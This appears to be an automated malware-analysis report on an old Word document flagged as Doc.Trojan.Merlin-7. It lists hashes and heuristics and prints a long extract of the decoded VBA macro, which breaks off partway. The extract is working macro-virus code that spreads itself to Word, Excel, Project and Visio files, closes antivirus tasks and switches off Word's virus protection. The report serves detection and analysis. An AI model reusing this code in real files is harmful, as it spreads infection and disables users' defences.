Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ecfe6b37a904d46…

MALICIOUS

Office (OLE)

Size: 44.0 KB
Created: 2003-09-06 16:37:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: a4631d2f313902bbb6cd408dad0590ef
SHA-1: bc36783fdc75c9acaafccd2fd833956e4c489f85
SHA-256: 2ecfe6b37a904d46961b03115c4e9d443af479637cf4589fa01e4af511b0c515
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of Shell() and CreateObject(), common for executing arbitrary code. ClamAV identifies the file as Doc.Trojan.Merlin-7. The VBA script appears to be attempting to interact with other Office applications and potentially execute external code, though obfuscation limits a precise understanding of the second-stage payload.

Heuristics 5

  • ClamAV: Doc.Trojan.Merlin-7 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Merlin-7
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11218 bytes
SHA-256: a0cccf5aa903d734a85822cf43d499235e978b1d8f7b71625e9980ddba827e51
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'
visiobj = "Visio.Application": visitarget$ = "Blank Drawing.vst": getvisio = 1
t = Application: If VBA.IsObject(t) Then noobj = "1": If noobj = "1" Then GoTo itsvisio
dramamine = Application.Version
ni = 1: Exie = "Excel.Application"
te$ = t: tested = Left(te$, 5)
If tested <> "Micro" Then GoTo itsvisio
If t = "Microsoft Word" Then GoTo notproject
If t = "Microsoft Excel" Then GoTo notwordeither
If t = "Microsoft Project" Then
runningapp = 3
If dramamine = "8.0" Then
'
End If
For Each x In Projects
On Error Resume Next
runningapp = 3
Set a = x.VBProject.VBComponents(getvisio).codemodule
Set tp = ThisProject.VBProject.VBComponents(getvisio).codemodule
cntr = tp.countoflines
If a.lines(4, 1) <> "t=application" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.lines(1, cntr)
'
'
End If
Next x
Set temp = Application.VBE.VBProjects(getvisio).VBComponents(getvisio).codemodule
If temp.lines(2, 1) <> "'" Then
temp.deletelines 1, temp.countoflines
temp.insertlines 1, tp.lines(1, tp.countoflines)
End If
End If
notproject:
ni = 2
If t = "Microsoft Word" Then
On Error GoTo getthereg
Set a = ActiveDocument.VBProject.VBComponents.Item(ni - 1).codemodule
Set tp = NormalTemplate.VBProject.VBComponents.Item(ni - 1).codemodule
runningapp = 1
'
'
'
For iv = 1 To Tasks.Count
av$ = Tasks(iv).Name
mv = InStr(1, av$, "irus", vbTextCompare)
If mv > 0 Then
Tasks(iv).Close
GoTo out
End If
Next iv
out:
If tp = "" Then GoTo getthereg
If dramamine <> "10.0" Then
Options.VirusProtection = (Rnd * 0)
End If
If tp.lines(2, 1) <> "'" Then
tp.deletelines 1, tp.countoflines
tp.insertlines 1, a.lines(1, a.countoflines)

End If
If a.lines(2, 1) <> "'" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.lines(1, tp.countoflines)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If

End If
GoTo crossing
notwordeither:
'
If t = "Microsoft Excel" Then
runningapp = 2: On Error GoTo crossing
Set a = ActiveWorkbook.VBProject.VBComponents(getvisio).codemodule
Set tp = ThisWorkBook.VBProject.VBComponents(getvisio).codemodule
runningapp = 2
If a.lines(2, 1) <> "'" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.countoflines(1, tp.countoflines)
ActiveWorkbook.SaveAs (ActiveWorkbook.FullName)
End If
End If
GoTo crossing
itsvisio:
'
runningapp = 4
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
Set docobj = Documents.Item(1)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.lines(2, 1) <> Chr(39) Then
gets.deletelines 1, gets.countoflines
gets.insertlines 1, nom.lines(1, nom.countoflines)
Documents(i).Save
End If
Next i
If noobj = "1" Then GoTo noinfw
crossing:
amd = Dir("c:\fallen.txt"): If amd <> "" Then getvisio = 2
If amd = "fallen.txt" Then GoTo getthereg
Open "c:\fallen.txt" For Output As 1: Print #1, "": Close 1
If t <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then
ra = Dir("c:\fallen.reg")
If ra = "" Then dropit = "true"
If dropit <> "true" Then GoTo nextone
On Error GoTo nextone: Set xlapp = CreateObject(Exie)
chk = Dir(xlapp.Application.StartupPath & "\Book1.xls")
If chk = "" Then
Set book1Obj = xlapp.workbooks.Add
book1Obj.VBProject.VBComponents.Item(1).codemodule.insertlines 1, a.lines(1, a.countoflines)
book1Obj.VBProject.VBComponents.Item(1).codemodule.replaceline 1, "Private Sub Workbook_Deactivate()"

book1Obj.SaveAs (xlapp.Application.StartupPath & "\Book1.xls")
book1Obj.Close
dropit = "true"
End If
xlapp.Quit
End If
nextone:
On Error GoTo novis
If tested = "Micro" And getvisio = 1 Then
Set vsapp = CreateObject(visiobj)
vsapp
... (truncated)